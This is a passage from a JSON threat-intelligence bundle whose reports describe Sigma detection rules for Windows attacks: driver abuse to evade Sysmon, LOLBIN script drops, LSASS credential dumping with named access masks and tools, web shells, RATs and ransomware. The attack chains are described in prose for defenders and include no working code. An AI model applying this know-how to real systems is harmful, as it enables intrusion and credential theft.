than an end-to-end campaign. The technique primarily involves an attacker having already achieved initial access and aiming to maintain persistence and evade detection.\n\n## Impact\n\nSuccessful deployment of the `PROCEXP152.sys` driver by malicious tools for defense evasion can lead to significant compromise of system visibility. By bypassing Sysmon and Windows Event Logging, attackers can execute commands, establish persistence, exfiltrate data, or deploy additional malware without leaving observable traces in standard security logs. This impairment makes it exceedingly difficult for security operations centers to detect and respond to ongoing intrusions, leading to prolonged dwell times and potentially widespread damage. While no specific victim counts are mentioned, this technique is broadly applicable to Windows environments, affecting organizations of all sectors reliant on endpoint detection for security.\n\n## Recommendation\n\n*   Deploy the `Suspicious PROCEXP152.sys File Created In TMP` Sigma rule to your SIEM/EDR to detect the creation of this driver in suspicious locations.\n*   Ensure `File Creation` logging (Event ID 11) is enabled for Sysmon or similar file system monitoring to capture the artifact referenced in the rule.\n*   Investigate any alerts generated by the `Suspicious PROCEXP152.sys File Created In TMP` rule, focusing on the parent process responsible for creating the `.sys` file.\n*   Review the referenced blog post ([https://web.archive.org/web/20230331181619/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/](https://web.archive.org/web/20230331181619/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/)) for further context on defense evasion techniques involving drivers.\n",
      "published": "2026-07-03T14:15:50Z",
      "labels": [
        "defense-evasion",
        "driver-abuse",
        "windows",
        "endpoint"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml"
        },
        {
          "source_name": "reference",
          "url": "https://web.archive.org/web/20230331181619/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Create or Modify System Process",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1543",
          "url": "https://attack.mitre.org/techniques/T1543"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--11000e5a-85df-58c0-908b-04c026e02780",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7f47c75b-ad62-5c2a-9e31-922d5a612e6e",
      "target_ref": "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--59877264-b67d-507f-8c52-dabb625e4616",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7f47c75b-ad62-5c2a-9e31-922d5a612e6e",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--7f47c75b-ad62-5c2a-9e31-922d5a612e6e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Potential Privileged System Service Operation - SeLoadDriverPrivilege",
      "description": "## Overview\n\nThis brief focuses on the detection of the `SeLoadDriverPrivilege` on Windows operating systems, a potent capability that, when abused, allows users to dynamically load and unload device drivers, granting kernel-mode access. This privilege is frequently leveraged by malicious actors for defense evasion, bypassing security controls like Sysmon and other endpoint detection and response (EDR) solutions, as highlighted by tools such as \"Ghost-In-The-Logs.\" Although this privilege is necessary for legitimate system operations and tools like Sysinternals, its use by unauthorized processes or users can indicate a critical security breach. Detecting its illegitimate invocation is crucial for identifying attempts to establish persistence, achieve privilege escalation, or perform advanced evasive maneuvers within an environment. The associated detection rule aims to flag suspicious instances by filtering out common benign activities.\n\n## Attack Chain\n\nThe provided source describes a detection mechanism for a specific privilege usage rather than a detailed attack chain for a complete compromise. The core malicious activity centers around the abuse of the `SeLoadDriverPrivilege`.\n\n1.  **Initial Access** (Not detailed in source, assumed prerequisite): An attacker gains a foothold on a Windows system, potentially through phishing or exploiting a vulnerability.\n2.  **Privilege Escalation Opportunity**: The attacker identifies an opportunity to leverage a user account or process with `SeLoadDriverPrivilege`.\n3.  **Malicious Driver Creation/Deployment**: The attacker prepares a malicious kernel driver designed for defense evasion, privilege escalation, or persistence.\n4.  **Driver Loading Attempt**: The attacker attempts to load the malicious driver using the `SeLoadDriverPrivilege`. This action triggers Windows Security Event ID 4673.\n5.  **Kernel-Mode Access Gained**: If successful, the malicious driver operates in kernel mode, granting the attacker high-level control over the system.\n6.  **Defense Evasion/System Manipulation**: From kernel mode, the attacker can disable or tamper with security products (e.g., EDR, antivirus), modify system logs (e.g., \"Ghost-In-The-Logs\" techniques), create persistent backdoors, or perform other highly privileged actions.\n7.  **Impact (e.g., Data Exfiltration, System Control)**: The kernel-mode access facilitates the attacker's ultimate objectives, such as exfiltrating sensitive data, deploying ransomware, or maintaining long-term control of the compromised system.\n\n## Impact\n\nThe successful exploitation of the `SeLoadDriverPrivilege` can lead to severe consequences, as it grants attackers kernel-mode access to a compromised Windows system. This level of access enables comprehensive defense evasion, allowing malicious actors to disable or bypass security controls, tamper with system logs (as demonstrated by tools like \"Ghost-In-The-Logs\"), and operate with stealth. Ultimately, this can lead to full system compromise, including privilege escalation to SYSTEM, installation of persistent backdoors, data exfiltration, or the deployment of ransomware. While specific victim counts or targeted sectors are not detailed, any organization relying on Windows infrastructure is susceptible to attacks leveraging this privilege for critical system compromise.\n\n## Recommendation\n\n*   Deploy the Sigma rule `Potential Privileged System Service Operation - SeLoadDriverPrivilege` provided in this brief to your SIEM and tune for your environment.\n*   Ensure Windows Security Event ID 4673 logging is enabled across all relevant endpoints to capture `SeLoadDriverPrivilege` usage, supporting the rule.\n*   Develop and maintain a whitelist of legitimate processes and users authorized to utilize `SeLoadDriverPrivilege` by refining the filters outlined in the `Potential Privileged System Service Operation - SeLoadDriverPrivilege` Sigma rule (e.g., `filter_main_exact`, `filter_optional_others`).\n*   Investigate any alerts generated by the `Potential Privileged System Service Operation - SeLoadDriverPrivilege` rule that do not match your established whitelist for potential malicious driver loading activity.\n",
      "published": "2026-07-03T14:14:48Z",
      "labels": [
        "windows",
        "defense-evasion",
        "privilege-escalation",
        "detection"
      ],
      "object_refs": [
        "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://web.archive.org/web/20230331181619/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/"
        },
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4673"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Signed Binary Proxy Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1218",
          "url": "https://attack.mitre.org/techniques/T1218"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--18619d91-a5b5-52a8-aff5-69d08d65772b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--326b4a48-f2aa-553f-aea8-7bf6d202ce27",
      "target_ref": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--87080bab-c0d6-5a60-8dff-aa71c83697c9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--326b4a48-f2aa-553f-aea8-7bf6d202ce27",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--326b4a48-f2aa-553f-aea8-7bf6d202ce27",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Legitimate Application Dropped Script Detection",
      "description": "## Overview\n\nThis threat brief focuses on a specific technique observed in various attack campaigns where adversaries leverage legitimate Windows applications or Living Off The Land Binaries (LOLBINs) to drop malicious script files onto a compromised system. This technique, often part of the stealth and execution phases of an attack, allows attackers to bypass traditional security controls that might flag direct execution of unknown scripts or executables. The detected behavior involves trusted binaries like `certutil.exe`, `mshta.exe`, `eqnedt32.exe`, or Adobe Acrobat Reader (`AcroRd32.exe`) creating script files such as `.ps1`, `.vbs`, `.hta`, or `.bat`. This abuse signifies malware staging, preparation for further execution, or direct command and control activity. Early detection of such activity is crucial as it can indicate an attacker's presence before more overt malicious actions occur.\n\n## Attack Chain\n\nThe provided source describes a specific detection pattern rather than a multi-stage attack chain. It identifies the misuse of legitimate applications and LOLBINs (e.g., `certutil.exe`, `mshta.exe`) to drop script files (e.g., `.ps1`, `.vbs`, `.hta`) onto the disk. This activity typically occurs as an intermediate step within a broader attack, often following initial access and preceding execution or persistence. Therefore, a complete 6-8 step attack chain from initial access to impact cannot be constructed solely from this detection-focused intelligence. This technique itself is a component of execution or defense evasion within a larger adversary's operational framework.\n\n## Impact\n\nIf this technique goes undetected, it can have severe consequences for an organization. The successful dropping of malicious scripts often signifies an imminent threat, as these scripts are typically used to establish persistence, download additional malware (like ransomware or infostealers), exfiltrate sensitive data, or move laterally within the network. Failure to detect this activity can lead to full system compromise, data breaches, significant financial losses due to ransomware, and reputational damage. While the specific impact depends on the nature of the dropped script, the act of a trusted binary creating an unexpected script is a high-fidelity indicator of malicious intent.\n\n## Recommendation\n\n*   Deploy the Sigma rule provided in this brief to your SIEM/EDR solution and ensure it is tuned for your environment.\n*   Enable comprehensive file event logging (e.g., Sysmon Event ID 11 or similar EDR capabilities) on all Windows endpoints to capture `Image` and `TargetFilename` values necessary for this detection.\n*   Investigate all alerts generated by the \"Legitimate Application Dropped Script\" rule promptly, as they indicate highly suspicious activity.\n*   Review and baseline legitimate uses of the applications and file types listed in the detection section (e.g., `certutil.exe`, `.ps1` files) to reduce false positives in your environment.\n",
      "published": "2026-07-03T14:13:51Z",
      "labels": [
        "living-off-the-land",
        "stealth",
        "execution",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_script.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326"
        },
        {
          "source_name": "reference",
          "url": "https://dmpdump.github.io/posts/TelegramRat/"
        },
        {
          "source_name": "reference",
          "url": "https://www.virustotal.com/gui/file/a0d5b30578acd1df9139e7a8a4bfc659dc2cf48f4dc0c5804b70890adeb9fa21/behavior"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OS Credential Dumping",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1003",
          "url": "https://attack.mitre.org/techniques/T1003"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5c4a5b82-6066-5a34-ae9e-1e9c4e413926",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b6fe1ea1-8c9c-530a-872a-463fa3bc23f4",
      "target_ref": "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b6fe1ea1-8c9c-530a-872a-463fa3bc23f4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Potentially Suspicious AccessMask Requested From LSASS",
      "description": "## Overview\n\nThis brief details a critical detection capability aimed at identifying credential dumping attempts on Windows systems. Threat actors frequently target the Local Security Authority Subsystem Service (LSASS) process to extract cached credentials, which can then be used for lateral movement, privilege escalation, and persistent access. The detection focuses on suspicious access mask requests to the LSASS process (lsass.exe). While legitimate processes, especially security products, may access LSASS, specific combinations of access rights and process names are highly indicative of malicious activity. This detection leverages Windows Security Event IDs 4656 and 4663, which log handle requests and object access attempts, to pinpoint anomalous interactions with LSASS. Implementing this detection helps defenders uncover post-exploitation activities and prevent further compromise.\n\n## Attack Chain\n\nThis brief focuses on a specific post-exploitation technique rather than a full attack chain:\n\n1.  **Initial Access (Prerequisite)**: An attacker gains initial access to a target Windows system through various means (e.g., phishing, exploiting a vulnerable service, RDP brute-force).\n2.  **Privilege Escalation**: The attacker achieves local administrator or SYSTEM privileges, which are often necessary to interact with the LSASS process.\n3.  **LSASS Process Targeting**: The attacker's malicious tool (e.g., Mimikatz, procdump) attempts to open a handle to the `lsass.exe` process.\n4.  **Suspicious Access Request**: The tool requests specific, often broad or highly privileged, access masks (e.g., `0x40`, `0x1400`, `0x100000`, `0x1f0fff`) to the LSASS process memory. These access masks allow reading or controlling the process's memory.\n5.  **Credential Dumping**: Upon successful handle acquisition, the tool reads the LSASS memory to extract cached user credentials, NTLM hashes, or Kerberos tickets.\n6.  **Lateral Movement / Persistence**: The stolen credentials are then used to authenticate to other systems on the network, escalate privileges further, or establish persistence.\n\n## Impact\n\nSuccessful credential dumping from LSASS allows attackers to obtain highly sensitive user credentials, including those of domain administrators. This enables unfettered lateral movement across the network, privilege escalation, and access to critical resources and data. The impact can range from complete domain compromise to widespread data exfiltration, system destruction, or deployment of ransomware. Organizations could face significant financial losses due to operational disruption, data recovery costs, regulatory fines, and reputational damage. Detecting and responding to these attempts is crucial to preventing broader compromises.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule to your SIEM solution to detect suspicious access to the LSASS process.\n*   Ensure Windows Security Event logging (specifically Event IDs 4656 and 4663) is enabled and configured to capture object access attempts on your endpoints.\n*   Review and tune the `filter_main_*` and `filter_optional_*` sections of the Sigma rule by adding legitimate internal security tools or processes that interact with LSASS for monitoring or management purposes, to reduce false positives.\n*   Investigate all `medium` severity alerts generated by this rule immediately, as they indicate potential credential dumping attempts.\n",
      "published": "2026-07-03T14:06:04Z",
      "labels": [
        "credential-dumping",
        "post-exploitation",
        "windows",
        "security-event"
      ],
      "object_refs": [
        "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html"
        },
        {
          "source_name": "reference",
          "url": "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Server Software Component",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1505",
          "url": "https://attack.mitre.org/techniques/T1505"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b11bb466-bd78-5113-847c-fe002bc407fc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--512b32dd-e45c-518e-93b2-99c5e4bb0fa6",
      "target_ref": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--512b32dd-e45c-518e-93b2-99c5e4bb0fa6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Detection of Web Shell via Antivirus Signature",
      "description": "## Overview\n\nThis intelligence focuses on the detection of web shells through antivirus signatures, which is a critical indicator of a compromised web server. A web shell is a malicious script or program uploaded to a web server by an attacker to enable remote administration and control. While antivirus solutions are often effective at blocking or quarantining these artifacts, the detection itself is a strong signal that an initial compromise has already occurred. Defenders must not solely rely on the antivirus blocking the threat but must conduct a thorough investigation to understand the initial access vector, the extent of the compromise, and whether other persistence mechanisms have been established. Early and thorough investigation of these alerts is paramount to preventing further attacker lateral movement, data exfiltration, or complete system takeover.\n\n## Attack Chain\n\n1.  Attacker gains initial access to a web server, typically by exploiting a vulnerability such as an insecure file upload, deserialization flaw, path traversal, or SQL injection.\n2.  The attacker deploys a web shell, which is a malicious script (e.g., `cmd.php`, `shell.jsp`, `asp.aspx`) written in a web scripting language, to a publicly accessible directory on the compromised web server.\n3.  The web shell is designed to provide remote command execution capabilities, allowing the attacker to interact with the underlying operating system through the web server.\n4.  The host's antivirus (AV) solution performs a scan (either real-time or scheduled) and identifies the newly deployed web shell based on its signature, matching patterns like 'PHP.Agent', 'C99shell', or 'Backdoor.ASP'.\n5.  The antivirus solution triggers an alert indicating the detection of a web shell, logging the event and potentially taking automated remediation actions like quarantining or deleting the file.\n6.  Security operations teams receive notification of the antivirus alert, signaling successful web shell deployment and confirming a prior compromise requiring immediate incident response.\n\n## Impact\n\nSuccessful web shell deployment often leads to severe consequences, including full remote code execution, data exfiltration, privilege escalation, and lateral movement within the network. Attackers utilize web shells to maintain persistence, conduct reconnaissance, deploy additional malware (e.g., ransomware), deface websites, or use the compromised server as a pivot point for further attacks. The presence of a web shell implies a critical breach of the web server, necessitating immediate containment and eradication to prevent widespread damage across the organization.\n\n## Recommendation\n\n*   Deploy the `Antivirus - Web Shell Detection Signature` Sigma rule to your SIEM and tune the `Signature` field with specific strings used by your organization's antivirus solution for web shell detections.\n*   Ensure comprehensive antivirus logging and integration with your SIEM to capture all `antivirus` category alerts, specifically those indicating web shell detections.\n*   Investigate all `high` level alerts generated by the `Antivirus - Web Shell Detection Signature` rule immediately to determine the initial compromise vector and scope of impact.\n*   Implement strong access controls and regular vulnerability scanning for all internet-facing web servers to prevent initial web shell deployment.\n",
      "published": "2026-07-03T14:04:46Z",
      "labels": [
        "webshell",
        "antivirus",
        "detection",
        "persistence"
      ],
      "object_refs": [
        "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/category/antivirus/av_webshell.yml"
        },
        {
          "source_name": "reference",
          "url": "https://www.nextron-systems.com/?s=antivirus"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/tennc/webshell"
        },
        {
          "source_name": "reference",
          "url": "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection"
        },
        {
          "source_name": "reference",
          "url": "https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection"
        },
        {
          "source_name": "reference",
          "url": "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection"
        },
        {
          "source_name": "reference",
          "url": "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection"
        },
        {
          "source_name": "reference",
          "url": "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection"
        },
        {
          "source_name": "reference",
          "url": "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e394ff07d39c0666821b7e/detection"
        },
        {
          "source_name": "reference",
          "url": "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection"
        },
        {
          "source_name": "reference",
          "url": "https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1203",
          "url": "https://attack.mitre.org/techniques/T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3be3c1bf-66aa-5d56-8112-927ff795583f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--aa9bd332-5293-5ed3-b6de-a27d147bb764",
      "target_ref": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--aa9bd332-5293-5ed3-b6de-a27d147bb764",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Detection of Malicious Remote Access Tools by Antivirus",
      "description": "## Overview\n\nThis threat brief focuses on the detection of numerous malicious Remote Access Tools (RATs) via Antivirus (AV) solutions, as identified by a SigmaHQ rule published on 2026-07-01. The rule targets a wide array of commonly abused RATs, including well-known malware families like AgentTesla, AsyncRAT, NanoCore, Quasar, and Remcos, among others. The presence of these tools on an endpoint, even if immediately blocked by AV, is a critical security event that demands immediate and thorough investigation. Such an alert signifies that an attacker has likely achieved initial access and attempted to establish persistent remote control, making it imperative to understand the delivery mechanism and scope of compromise beyond the simple AV remediation. This detection is crucial for identifying early stages of compromise and preventing further malicious activity.\n\n## Attack Chain\n\n(The provided source focuses on a detection signature for post-compromise activity, rather than detailing a specific attack chain. Therefore, a generic attack chain cannot be accurately described without speculative information.)\n\n## Impact\n\nIf Remote Access Tools successfully bypass antivirus defenses and become fully operational, they grant attackers comprehensive control over compromised systems. This can lead to severe consequences including, but not limited to, extensive data exfiltration, installation of additional malware such as ransomware or credential stealers, persistent unauthorized access, lateral movement across the network, and complete disruption of organizational operations. Even when an antivirus successfully blocks a RAT, the initial alert indicates a successful delivery attempt that must be investigated to determine the initial access vector and prevent future attacks. The impact of such successful compromise can range from significant financial losses due to data breaches or ransomware, to reputational damage and regulatory penalties.\n\n## Recommendation\n\n*   Deploy the `Antivirus - Remote Access Tools Signature` Sigma rule to your SIEM/EDR to ensure immediate visibility into AV alerts flagging known malicious RATs.\n*   Investigate all alerts generated by the `Antivirus - Remote Access Tools Signature` rule. Focus on identifying the initial access vector that led to the RAT's presence on the system.\n*   Review network logs for suspicious outbound connections from systems where `Signature` events related to tools like `AgentTesla` or `AsyncRAT` were detected.\n*   Ensure endpoint protection solutions are up-to-date and configured to report `antivirus` category events to your centralized logging platform.\n",
      "published": "2026-07-03T14:03:51Z",
      "labels": [
        "remote-access-trojan",
        "rat",
        "antivirus",
        "detection",
        "malware",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/category/antivirus/av_remote_access_toolkit.yml"
        },
        {
          "source_name": "reference",
          "url": "https://www.nextron-systems.com/?s=antivirus"
        },
        {
          "source_name": "reference",
          "url": "https://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4c3e7380-a536-599a-8a1e-e402b95df8d6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Encrypted for Impact",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1486",
          "url": "https://attack.mitre.org/techniques/T1486"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bf0d9a72-f4ea-5ec6-8e9b-d69ba3877b2d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f0926f01-fb3b-552f-8908-e92086d4efc5",
      "target_ref": "attack-pattern--4c3e7380-a536-599a-8a1e-e402b95df8d6"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f0926f01-fb3b-552f-8908-e92086d4efc5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Antivirus - Ransomware Signature Detection",
      "description": "## Overview\n\nThis threat brief focuses on a critical detection rule designed to identify Antivirus (AV) alerts specifically indicating the presence of ransomware. The rule monitors AV logs for signatures containing keywords associated with prominent ransomware families such as Babuk, ContiCrypt, Lockbit, Ryuk, and WannaCry. While AV solutions often block detected malware, the presence of ransomware on an endpoint warrants immediate and thorough investigation to understand the initial access vector, lateral movement attempts, and potential pre-positioning. This detection helps security operations teams prioritize alerts that signify a direct and severe threat, ensuring that incidents are not overlooked even if initial containment by AV appears successful. The rule is highly relevant for Windows environments where many of these ransomware families primarily operate.\n\n## Attack Chain\n\n[The source does not describe a specific attack chain for a particular ransomware campaign or vulnerability. This brief focuses on the detection of ransomware after it has been identified by an antivirus solution.]\n\n## Impact\n\nIf ransomware successfully executes, organizations face severe consequences including data encryption, system lockout, significant operational disruption, and potential data exfiltration. The financial impact can be substantial, encompassing ransom payments, recovery costs, legal fees, and reputational damage. While an Antivirus alert signifies that the ransomware was detected, failing to investigate the origin and scope of the infection can leave underlying vulnerabilities unaddressed, leading to re-infection or exploitation by other threats. Rapid response to AV-identified ransomware is crucial to prevent successful encryption or further damage, even if the initial payload was blocked.\n\n## Recommendation\n\n*   Deploy the \"Antivirus - Ransomware Signature\" Sigma rule to your SIEM system immediately.\n*   Ensure comprehensive antivirus logging is enabled on all endpoints, forwarding all AV-related events, especially detections, to your central logging infrastructure.\n*   Establish and test incident response procedures for confirmed ransomware detections, focusing on containment, eradication, and forensic investigation.\n*   Prioritize investigation of any alerts generated by the \"Antivirus - Ransomware Signature\" rule, even if the AV reports the threat was blocked, to determine the root cause and extent of potential compromise.\n",
      "published": "2026-07-03T14:03:01Z",
      "labels": [
        "ransomware",
        "antivirus",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--4c3e7380-a536-599a-8a1e-e402b95df8d6"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.nextron-systems.com/?s=antivirus"
        },
        {
          "source_name": "reference",
          "url": "https://www.virustotal.com/gui/file/43b0f7872900bd234975a0877744554f4f355dc57505517abd1ef611e1ce6916"
        },
        {
          "source_name": "reference",
          "url": "https://www.virustotal.com/gui/file/c312c05ddbd227cbb08958876df2b69d0f7c1b09e5689eb9d93c5b357f63eff7"
        },
        {
          "source_name": "reference",
          "url": "https://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045"
        },
        {
          "source_name": "reference",
          "url": "https://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d"
        },
        {
          "source_name": "reference",
          "url": "https://www.virustotal.com/gui/file/69fe77dd558e281621418980040e2af89a2547d377d0f2875502005ce22bc95c"
        },
        {
          "source_name": "reference",
          "url": "https://www.virustotal.com/gui/file/6f0f20da34396166df352bf301b3c59ef42b0bc67f52af3d541b0161c47ede05"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OS Credential Dumping",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1003",
          "url": "https://attack.mitre.org/techniques/T1003"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d405d1f7-cfbb-5c03-a3f7-03c9e294736c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5dd4226c-fb85-5ea6-9876-56a1cfc60e85",
      "target_ref": "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
